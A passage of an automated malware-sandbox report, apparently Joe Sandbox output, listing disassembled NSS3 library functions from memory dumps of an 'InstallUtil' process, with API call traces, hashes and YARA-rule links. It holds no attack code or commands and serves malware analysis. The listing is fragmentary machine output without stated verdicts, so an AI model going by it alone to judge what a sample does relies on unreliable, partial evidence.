                                                                                                                  • PK11_HashBuf.NSS3(?,?,?,?,?,?,?,?), ref: 6C75E65C
                                                                                                                    • Part of subcall function 6C77DDD0: SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C77DDEC
                                                                                                                    • Part of subcall function 6C77DDD0: PK11_DigestBegin.NSS3(00000000), ref: 6C77DE70
                                                                                                                    • Part of subcall function 6C77DDD0: PK11_DigestOp.NSS3(00000000,00000004,00000000), ref: 6C77DE83
                                                                                                                    • Part of subcall function 6C77DDD0: HASH_ResultLenByOidTag.NSS3(?), ref: 6C77DE95
                                                                                                                    • Part of subcall function 6C77DDD0: PK11_DigestFinal.NSS3(00000000,00000000,?,00000040), ref: 6C77DEAE
                                                                                                                    • Part of subcall function 6C77DDD0: PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C77DEBB
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(00000000,00000000,?), ref: 6C75E68E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: K11_Util$Digest$ArenaItem_Mark_$AllocBeginContextCriticalDestroyEnterErrorFinalFindHashResultSectionTag_UnlockValueZfree
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2865137721-0
                                                                                                                  • Opcode ID: a3a89b2af733e35b5063d925a0347e14bcb9d919b36c9b216162f5a6fb2f6e13
                                                                                                                  • Instruction ID: 7923bacb8af78f69bdcddce912684442eac4bd67935f3893c4a49f0f8cd3815e
                                                                                                                  • Opcode Fuzzy Hash: a3a89b2af733e35b5063d925a0347e14bcb9d919b36c9b216162f5a6fb2f6e13
                                                                                                                  • Instruction Fuzzy Hash: 56213176B022196FFB004EA59E88F6A7A98DF84298F944174ED1897A91EF21DD24C3D0
                                                                                                                  Function 6C75AD90 Relevance: 7.6, APIs: 5, Instructions: 72memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PORT_ArenaMark_Util.NSS3(00000000,?,6C753FFF,00000000,?,?,?,?,?,6C751A1C,00000000,00000000), ref: 6C75ADA7
                                                                                                                    • Part of subcall function 6C7B14C0: TlsGetValue.KERNEL32 ref: 6C7B14E0
                                                                                                                    • Part of subcall function 6C7B14C0: EnterCriticalSection.KERNEL32 ref: 6C7B14F5
                                                                                                                    • Part of subcall function 6C7B14C0: PR_Unlock.NSS3 ref: 6C7B150D
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6C753FFF,00000000,?,?,?,?,?,6C751A1C,00000000,00000000), ref: 6C75ADB4
                                                                                                                    • Part of subcall function 6C7B10C0: TlsGetValue.KERNEL32(?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B10F3
                                                                                                                    • Part of subcall function 6C7B10C0: EnterCriticalSection.KERNEL32(?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B110C
                                                                                                                    • Part of subcall function 6C7B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B1141
                                                                                                                    • Part of subcall function 6C7B10C0: PR_Unlock.NSS3(?,?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B1182
                                                                                                                    • Part of subcall function 6C7B10C0: TlsGetValue.KERNEL32(?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B119C
                                                                                                                  • SECITEM_CopyItem_Util.NSS3(00000000,?,6C753FFF,?,?,?,?,6C753FFF,00000000,?,?,?,?,?,6C751A1C,00000000), ref: 6C75ADD5
                                                                                                                    • Part of subcall function 6C7AFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C7A8D2D,?,00000000,?), ref: 6C7AFB85
                                                                                                                    • Part of subcall function 6C7AFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C7AFBB1
                                                                                                                  • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C8794B0,?,?,?,?,?,?,?,?,6C753FFF,00000000,?), ref: 6C75ADEC
                                                                                                                    • Part of subcall function 6C7AB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8818D0,?), ref: 6C7AB095
                                                                                                                  • PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C753FFF), ref: 6C75AE3C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2372449006-0
                                                                                                                  • Opcode ID: 69dcf0a5c7bb6f5eac6b56ce965ac626aa607b54d5fa6174770370e19374b5ff
                                                                                                                  • Instruction ID: dcea579a569e12094ff80be3d64bbe78601eed88b27e8aa25894860d1efc041b
                                                                                                                  • Opcode Fuzzy Hash: 69dcf0a5c7bb6f5eac6b56ce965ac626aa607b54d5fa6174770370e19374b5ff
                                                                                                                  • Instruction Fuzzy Hash: 0E118631E003051BE7109B659E09BBF73BCDF8021CF404638EC1996700FB20E96982F2
                                                                                                                  Function 6C7A8800 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • TlsGetValue.KERNEL32(?,6C7B085A,00000000,?,6C758369,?), ref: 6C7A8821
                                                                                                                  • TlsGetValue.KERNEL32(?,?,6C7B085A,00000000,?,6C758369,?), ref: 6C7A883D
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,6C7B085A,00000000,?,6C758369,?), ref: 6C7A8856
                                                                                                                  • PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C7A8887
                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,6C7B085A,00000000,?,6C758369,?), ref: 6C7A8899
                                                                                                                    • Part of subcall function 6C7407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6D204A), ref: 6C7407AD
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6D204A), ref: 6C7407CD
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6D204A), ref: 6C7407D6
                                                                                                                    • Part of subcall function 6C7407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6D204A), ref: 6C7407E4
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,6C6D204A), ref: 6C740864
                                                                                                                    • Part of subcall function 6C7407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C740880
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,?,6C6D204A), ref: 6C7408CB
                                                                                                                    • Part of subcall function 6C7407A0: TlsGetValue.KERNEL32(?,?,6C6D204A), ref: 6C7408D7
                                                                                                                    • Part of subcall function 6C7407A0: TlsGetValue.KERNEL32(?,?,6C6D204A), ref: 6C7408FB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Value$calloc$CondCriticalEnterSectionUnlockWait
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2759447159-0
                                                                                                                  • Opcode ID: 82b84c1f4ec67df0759db8ca45b4ce6b506c652fa434b6ce1881255165e446ba
                                                                                                                  • Instruction ID: d9cd667e578ee9f7f9c8f7e590cfcbb243ab9092d28bad60ba0a3d9b28de6838
                                                                                                                  • Opcode Fuzzy Hash: 82b84c1f4ec67df0759db8ca45b4ce6b506c652fa434b6ce1881255165e446ba
                                                                                                                  • Instruction Fuzzy Hash: 2F219CB49146458FCB00AFB9C68816ABBF4FF05348F014676DC9497701EB30D496CBD2
                                                                                                                  Function 6C7728A0 Relevance: 7.6, APIs: 5, Instructions: 66COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • TlsGetValue.KERNEL32(?,?,?,6C7680DD), ref: 6C7728BA
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,6C7680DD), ref: 6C7728D3
                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,6C7680DD), ref: 6C7728E8
                                                                                                                  • DeleteCriticalSection.KERNEL32(?,?,?,?,?,6C7680DD), ref: 6C77290E
                                                                                                                  • free.MOZGLUE(?,?,?,?,?,?,6C7680DD), ref: 6C77291A
                                                                                                                    • Part of subcall function 6C769270: DeleteCriticalSection.KERNEL32(?,?,6C775089,?,6C773B70,?,?,?,?,?,6C775089,6C76F39B,00000000), ref: 6C76927F
                                                                                                                    • Part of subcall function 6C769270: free.MOZGLUE(?,?,6C773B70,?,?,?,?,?,6C775089,6C76F39B,00000000), ref: 6C769286
                                                                                                                    • Part of subcall function 6C769270: PL_HashTableDestroy.NSS3(?,6C773B70,?,?,?,?,?,6C775089,6C76F39B,00000000), ref: 6C769292
                                                                                                                    • Part of subcall function 6C768B50: TlsGetValue.KERNEL32(00000000,?,6C770948,00000000), ref: 6C768B6B
                                                                                                                    • Part of subcall function 6C768B50: EnterCriticalSection.KERNEL32(?,?,?,6C770948,00000000), ref: 6C768B80
                                                                                                                    • Part of subcall function 6C768B50: PL_FinishArenaPool.NSS3(?,?,?,?,6C770948,00000000), ref: 6C768B8F
                                                                                                                    • Part of subcall function 6C768B50: PR_Unlock.NSS3(?,?,?,?,6C770948,00000000), ref: 6C768BA1
                                                                                                                    • Part of subcall function 6C768B50: DeleteCriticalSection.KERNEL32(?,?,?,?,6C770948,00000000), ref: 6C768BAC
                                                                                                                    • Part of subcall function 6C768B50: free.MOZGLUE(?,?,?,?,?,6C770948,00000000), ref: 6C768BB8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSection$Deletefree$EnterUnlockValue$ArenaDestroyFinishHashPoolTable
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3225375108-0
                                                                                                                  • Opcode ID: 610012159b129c52a33b71761720b3449d0d30239c47cc5e5856e7547ef568b5
                                                                                                                  • Instruction ID: 4698826b540e529ffefdc99669ae26e87e8c54fa2172d4c26025bfbb43877fd0
                                                                                                                  • Opcode Fuzzy Hash: 610012159b129c52a33b71761720b3449d0d30239c47cc5e5856e7547ef568b5
                                                                                                                  • Instruction Fuzzy Hash: 062119B5A04A05DBCB10AF79C18C569BBF0FF05358F054969DC9497B00E731E895CBE2
                                                                                                                  Function 6C7E04C0 Relevance: 7.6, APIs: 5, Instructions: 63synchronizationCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • WaitForSingleObject.KERNEL32(ED850FC0,000000FF,?,00000000,?,6C7E461B,-00000004), ref: 6C7E04DF
                                                                                                                  • TlsGetValue.KERNEL32(?,00000000,?,6C7E461B,-00000004), ref: 6C7E0510
                                                                                                                  • EnterCriticalSection.KERNEL32(ED850FDC), ref: 6C7E0520
                                                                                                                  • PR_SetError.NSS3(FFFFE89D,00000000,?,00000000,?,6C7E461B,-00000004), ref: 6C7E0534
                                                                                                                  • GetLastError.KERNEL32(?,6C7E461B,-00000004), ref: 6C7E0543
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Error$CriticalEnterLastObjectSectionSingleValueWait
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3052423345-0
                                                                                                                  • Opcode ID: 591a48cb3f17251a98fb3d76ca55b55fa28dc81abfa006b7e08027fd0ea4cb0a
                                                                                                                  • Instruction ID: 8227e86150bf7a12d0be95a9227b9855f93cde57a1941f0a008d9d607aa3a8e5
                                                                                                                  • Opcode Fuzzy Hash: 591a48cb3f17251a98fb3d76ca55b55fa28dc81abfa006b7e08027fd0ea4cb0a
                                                                                                                  • Instruction Fuzzy Hash: 98113A72A041416BDB107B789E08F6937A4EF0A31DF644634E425D39D1EF31D544DBD1
                                                                                                                  Function 6C768FE0 Relevance: 7.6, APIs: 5, Instructions: 63threadCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PR_GetThreadPrivate.NSS3(FFFFFFFF,?,6C770710), ref: 6C768FF1
                                                                                                                  • PR_CallOnce.NSS3(6C8B2158,6C769150,00000000,?,?,?,6C769138,?,6C770710), ref: 6C769029
                                                                                                                  • calloc.MOZGLUE(00000001,00000000,?,?,6C770710), ref: 6C76904D
                                                                                                                  • memcpy.VCRUNTIME140(00000000,00000000,00000000,?,?,?,?,6C770710), ref: 6C769066
                                                                                                                  • PR_SetThreadPrivate.NSS3(00000000,?,?,?,?,6C770710), ref: 6C769078
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: PrivateThread$CallOncecallocmemcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1176783091-0
                                                                                                                  • Opcode ID: 431a8c15d5aa3d414bb2225900d39f6a36a675ba4df85f1b93cb2ead2c75f9b0
                                                                                                                  • Instruction ID: a38a1fb801ffc7fd85eada409ee55e9a4292aab833ffc58cf0c513e8ff48fcb0
                                                                                                                  • Opcode Fuzzy Hash: 431a8c15d5aa3d414bb2225900d39f6a36a675ba4df85f1b93cb2ead2c75f9b0
                                                                                                                  • Instruction Fuzzy Hash: A311CE61B0021256EB201BAEAE04A7A72A8EB927ACF540531FC88D6F41F752CD45C3E5
                                                                                                                  Function 6C77CD80 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 6C791E10: TlsGetValue.KERNEL32 ref: 6C791E36
                                                                                                                    • Part of subcall function 6C791E10: EnterCriticalSection.KERNEL32(?,?,?,6C76B1EE,2404110F,?,?), ref: 6C791E4B
                                                                                                                    • Part of subcall function 6C791E10: PR_Unlock.NSS3 ref: 6C791E76
                                                                                                                  • free.MOZGLUE(?,6C77D079,00000000,00000001), ref: 6C77CDA5
                                                                                                                  • PK11_FreeSymKey.NSS3(?,6C77D079,00000000,00000001), ref: 6C77CDB6
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000001,6C77D079,00000000,00000001), ref: 6C77CDCF
                                                                                                                  • DeleteCriticalSection.KERNEL32(?,6C77D079,00000000,00000001), ref: 6C77CDE2
                                                                                                                  • free.MOZGLUE(?), ref: 6C77CDE9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1720798025-0
                                                                                                                  • Opcode ID: e5efa8fd0bd9beb481da9e23b26432e1c9b3fe6bf5b804702ae98dae35b4987a
                                                                                                                  • Instruction ID: 37f087b21ee07e7a2c0a20749c30f488f83561c0ede2ec82d722ab37f36a6900
                                                                                                                  • Opcode Fuzzy Hash: e5efa8fd0bd9beb481da9e23b26432e1c9b3fe6bf5b804702ae98dae35b4987a
                                                                                                                  • Instruction Fuzzy Hash: 4311A3B2B01515ABDF10AEA5EE49A9A776CBB0825A7144131E90987E01E732F434C7E1
                                                                                                                  Function 6C7E2CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 6C7E5B40: PR_GetIdentitiesLayer.NSS3 ref: 6C7E5B56
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7E2CEC
                                                                                                                    • Part of subcall function 6C7FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7FC2BF
                                                                                                                  • PR_EnterMonitor.NSS3(?), ref: 6C7E2D02
                                                                                                                  • PR_EnterMonitor.NSS3(?), ref: 6C7E2D1F
                                                                                                                  • PR_ExitMonitor.NSS3(?), ref: 6C7E2D42
                                                                                                                  • PR_ExitMonitor.NSS3(?), ref: 6C7E2D5B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1593528140-0
                                                                                                                  • Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                                                  • Instruction ID: dcf9c0b5fc983d75212edc183cb7d895f69810899ff5bc857cfc661ab3de8a59
                                                                                                                  • Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                                                  • Instruction Fuzzy Hash: 4F01C4B2A446015FE730DF2AFD45BC7B7A1EF49318F004935E95D86B21E632F8158792
                                                                                                                  Function 6C7E2D70 Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 6C7E5B40: PR_GetIdentitiesLayer.NSS3 ref: 6C7E5B56
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7E2D9C
                                                                                                                    • Part of subcall function 6C7FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7FC2BF
                                                                                                                  • PR_EnterMonitor.NSS3(?), ref: 6C7E2DB2
                                                                                                                  • PR_EnterMonitor.NSS3(?), ref: 6C7E2DCF
                                                                                                                  • PR_ExitMonitor.NSS3(?), ref: 6C7E2DF2
                                                                                                                  • PR_ExitMonitor.NSS3(?), ref: 6C7E2E0B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1593528140-0
                                                                                                                  • Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                                                                                  • Instruction ID: 986770e1674d6ca6e07e1b57c96ee6e2efd88944ce60b9432499b05b4bbd78dc
                                                                                                                  • Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                                                                                  • Instruction Fuzzy Hash: 120108B2A442015FE6309E29FD05BC7B3A5EF45318F000834E95D87B11D632F8258692
                                                                                                                  Function 6C77AE30 Relevance: 7.6, APIs: 5, Instructions: 54COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 6C763090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C77AE42), ref: 6C7630AA
                                                                                                                    • Part of subcall function 6C763090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C7630C7
                                                                                                                    • Part of subcall function 6C763090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C7630E5
                                                                                                                    • Part of subcall function 6C763090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C763116
                                                                                                                    • Part of subcall function 6C763090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C76312B
                                                                                                                    • Part of subcall function 6C763090: PK11_DestroyObject.NSS3(?,?), ref: 6C763154
                                                                                                                    • Part of subcall function 6C763090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C76317E
                                                                                                                  • SECKEY_DestroyPublicKey.NSS3(00000000,?,00000000,?,6C7599FF,?,?,?,?,?,?,?,?,?,6C752D6B,?), ref: 6C77AE67
                                                                                                                  • SECITEM_DupItem_Util.NSS3(-00000014,?,00000000,?,6C7599FF,?,?,?,?,?,?,?,?,?,6C752D6B,?), ref: 6C77AE7E
                                                                                                                  • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C752D6B,?,?,00000000), ref: 6C77AE89
                                                                                                                  • PK11_MakeIDFromPubKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,6C752D6B,?,?,00000000), ref: 6C77AE96
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,6C752D6B,?,?), ref: 6C77AEA3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
